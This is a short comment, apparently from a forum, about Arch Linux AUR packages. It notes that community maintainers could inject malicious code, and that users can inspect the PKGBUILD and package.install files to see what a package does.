AUR packages are maintained by members of the community. If a malicious member of the community wanted to inject code into an AUR package, they could. The same is true of any community maintained repo on any distro. However, AUR has an advantage in that you have the ability to see exactly what the package is going to do because the all the instructions are contained in the PKGBUILD and the package.install file.